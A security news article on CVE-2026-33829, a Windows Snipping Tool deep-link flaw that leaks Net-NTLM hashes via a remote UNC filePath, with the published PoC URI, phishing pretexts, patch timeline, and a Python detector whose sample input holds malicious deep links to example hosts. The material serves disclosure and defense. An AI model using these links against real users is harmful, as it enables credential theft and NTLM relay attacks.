Industry News & Leadership · Apr 21, 2026

PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability

Cybersecurity News · Archived Apr 21, 2026



A proof-of-concept (PoC) exploit has been publicly released for a newly disclosed vulnerability in Microsoft’s Snipping Tool that allows attackers to silently steal users’ Net-NTLM credential hashes by luring them to a malicious webpage. Tracked as CVE-2026-33829, the flaw resides in how Windows Snipping Tool handles deep link URI registrations using the ms-screensketch protocol scheme.

Affected versions of the application register this deep link, which accepts a filePath parameter. Due to a lack of proper input validation, an attacker can supply a UNC path pointing to a remote, attacker-controlled SMB server, coercing an authenticated SMB connection and capturing the victim’s Net-NTLM hash in the process.

The vulnerability was discovered and reported by security researchers at Black Arrow, who coordinated disclosure with Microsoft prior to going public.

Windows Snipping Tool PoC

Exploitation requires minimal technical sophistication. An attacker simply needs to host a malicious URL, or an HTML page that auto-triggers the deep link, and convince the target to visit it. The PoC from Black Arrow Security demonstrates the attack with a single browser-triggered URI:

    ms-screensketch:edit?&filePath=\\<attacker-smb-server>\file.png&isTemporary=false&saved=true&source=Toast

When a victim opens this link, Snipping Tool launches and silently attempts to load the remote resource over SMB. During this connection attempt, Windows automatically transmits the user’s Net-NTLM authentication response to the attacker’s server, exposing credentials that can then be cracked offline or used in NTLM relay attacks against internal network resources.

What makes CVE-2026-33829 particularly dangerous is how naturally it lends itself to social engineering campaigns. Because the Snipping Tool actually opens during exploitation, the attack is visually consistent with believable pretexts such as asking an employee to crop a corporate wallpaper, edit a badge photo, or review an HR document. An attacker could register a domain like snip.example.com and serve a convincing image URL that silently delivers the malicious deep link payload behind the scenes. The victim sees nothing unusual; the Snipping Tool opens as expected while NTLM authentication occurs transparently in the background. This attack vector is especially effective in corporate environments where phishing emails referencing internal HR portals, IT helpdesks, or shared document systems are common.

Patch Availability and Timeline

Microsoft addressed the vulnerability in its April 14, 2026, Patch Tuesday security update. The disclosure timeline is as follows:

- March 23, 2026: Vulnerability reported to Microsoft.
- April 14, 2026: Microsoft releases a security patch.
- April 14, 2026: Coordinated public advisory and PoC release.

Organizations and individual users running affected versions of the Windows Snipping Tool should immediately apply the April 14, 2026, security update. Security teams should also monitor internal networks for unexpected outbound SMB connections (port 445) to external or unknown hosts, which could indicate active exploitation attempts. Blocking outbound SMB traffic at the network perimeter remains a strong defensive measure regardless of patch status.
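A defensive check for the deep link described above, added here as an example (not code from the article, Black Arrow, or Microsoft): it scans HTML, mail or proxy-log text for ms-screensketch links and reports those whose filePath points at a remote host. The function names, the constructed sample hosts, and the path forms beyond the backslash UNC form shown in the article (percent-encoded, file://, \\?\UNC\) are assumptions made to keep the check conservative.

```python
import html
import re
from urllib.parse import parse_qs, unquote

# Deep links using the scheme named in the article, as found in HTML, mail or logs.
DEEP_LINK = re.compile(r"ms-screensketch:[^\s\"'<>]+", re.IGNORECASE)

def remote_host(path):
    """Return the server name if path refers to a remote share, else None."""
    prev = None
    while prev != path:                    # undo nested percent-encoding
        prev, path = path, unquote(path)
    p = path.strip().replace("\\", "/")
    if p.lower().startswith("file:"):      # file://server/share/x (assumed form)
        p = p[5:]
    if p.lower().startswith("//?/unc/"):   # \\?\UNC\server\share\x (assumed form)
        p = "//" + p[8:]
    m = re.match(r"//([^/]+)", p)          # exactly two slashes, then a host
    if not m or m.group(1) in (".", "?"):  # local device or drive path
        return None
    return m.group(1)

def find_suspicious_links(text):
    """Return (link, host) for every deep link whose filePath is remote."""
    hits = []
    for link in DEEP_LINK.findall(html.unescape(text)):
        query = link.partition("?")[2]
        # Parameter names are compared case-insensitively (an assumption).
        params = {k.lower(): v for k, v in parse_qs(query).items()}
        for value in params.get("filepath", []):
            host = remote_host(value)
            if host:
                hits.append((link, host))
    return hits

# Constructed sample input: an HTML anchor, a raw link, and a benign local path.
SAMPLE = r'''
<a href="ms-screensketch:edit?&amp;filePath=%5C%5Cfiles.example.net%5Cshare%5Ca.png&amp;source=Toast">badge photo</a>
ms-screensketch:edit?&filePath=\\198.51.100.7\img\file.png&isTemporary=false&saved=true&source=Toast
ms-screensketch:edit?&filePath=C:\Users\alice\Pictures\shot.png&source=Toast
'''

if __name__ == "__main__":
    for link, host in find_suspicious_links(SAMPLE):
        print(f"remote filePath -> {host}: {link}")
```

A hit on mail or web content is worth correlating with outbound port 445 connections from the same workstation.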